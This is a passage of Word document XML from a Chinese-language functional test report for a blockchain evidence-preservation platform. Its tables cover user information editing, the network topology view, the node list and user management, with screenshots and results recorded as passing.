              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="316" w:name="_Toc21226"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>用户信息管理</w:t>
            </w:r>
            <w:bookmarkEnd w:id="316"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="40906D9B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A9F606B"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7F42CBC6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>对用户信息进行管理，修改。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3E8E3A1B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FC9A4C1"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75C26AF5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="77717E56" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7157F672"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56966F0B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>点击左侧菜单栏“账户”修改个人信息。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="642EEE1B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4E2033E0" wp14:editId="4472E999">
                  <wp:extent cx="4211955" cy="1865630"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="13970"/>
                  <wp:docPr id="114" name="图片 114" descr="clie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lient7"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId45"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4211955" cy="1865630"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="03D7A399" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5808A519"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5EB293A9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>对用户信息进行管理，修改用户信息成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="76C23A57" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02ABD8F6"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15AF0792" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14450555" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="317" w:name="_Toc36487938"/>
      <w:bookmarkStart w:id="318" w:name="_Toc36573239"/>
      <w:bookmarkStart w:id="319" w:name="_Toc36630325"/>
      <w:r w:rsidRPr="00536672">
        <w:t>区块链存证测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="317"/>
      <w:bookmarkEnd w:id="318"/>
      <w:bookmarkEnd w:id="319"/>
    </w:p>
    <w:p w14:paraId="36EA4CBF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="320" w:name="_Toc36487939"/>
      <w:r w:rsidRPr="00536672">
        <w:t>拓扑图</w:t>
      </w:r>
      <w:bookmarkEnd w:id="320"/>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03203934" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="558EFE12"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69B5EBB4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>拓扑图</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6A66889A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="063F2715"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3FCB0408" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>功能测试、界面测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="70B8EB09" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A936777"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03F5332D"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78466B4E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="011DA020"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689495CF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:firstLineChars="200" w:firstLine="360"/>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查看IP分布信息和节点可信证实状态</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27440A28"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="07786887" wp14:editId="314EC3A2">
                  <wp:extent cx="4201160" cy="3072765"/>
                  <wp:effectExtent l="0" t="0" r="15240" b="635"/>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46"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201160" cy="3072765"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="788CBE91" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="408F9A2E"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601AA084" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="58D603B7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A77BFFB"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6F0CCB09" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25596F9B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="321" w:name="_Toc36487940"/>
      <w:r w:rsidRPr="00536672">
        <w:t>节点列表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="321"/>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49268FC0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="731B44E7"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782F4993" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>节点列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0253A50A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6765A29F"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411CA0DA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2D2993C8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DEF1BF1"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390FC5F1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="26BDE5EC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F172258"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258D56C6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A46A460" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="35B3E75B" wp14:editId="51BF6F2A">
                  <wp:extent cx="4189730" cy="1369060"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="2540"/>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47"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4189730" cy="1369060"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="431CC46D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="381887AF" wp14:editId="201A0DDB">
                  <wp:extent cx="4198620" cy="2035810"/>
                  <wp:effectExtent l="0" t="0" r="17780" b="21590"/>
                  <wp:docPr id="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48"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4198620" cy="2035810"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="41A8635D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="229256C3" wp14:editId="63174643">
                  <wp:extent cx="4191000" cy="1429385"/>
                  <wp:effectExtent l="0" t="0" r="0" b="18415"/>
                  <wp:docPr id="1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49"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4191000" cy="1429385"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="73F8B17C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0EEF66DD" wp14:editId="1149DCB1">
                  <wp:extent cx="4201795" cy="1273810"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="21590"/>
                  <wp:docPr id="1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50"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="1273810"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0D0000CA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E2A5C95"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1A2EB5C5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="566AE810" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="542AFE07"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106038AC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E5595E3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="322" w:name="_Toc36487941"/>
      <w:r w:rsidRPr="00536672">
        <w:t>用户管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="322"/>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151BE064" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14640AC5"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5CFDF138" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>用户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="478E94E7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="697C1725"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5890D6D5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>开启、停用用户、搜索用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="63FB7B8B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43F32E7F"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634B8A0A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1D555515" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41BF8280"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6AFE3DC4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>在用户管理页面中，管理员可以查看当前区块链存证的用户，并且停用账号。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36947D2B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="59A432D0" wp14:editId="0B3E3E77">
                  <wp:extent cx="4190365" cy="2266315"/>
                  <wp:effectExtent l="0" t="0" r="635" b="19685"/>
                  <wp:docPr id="1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51"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4190365" cy="2266315"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7992A2EC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
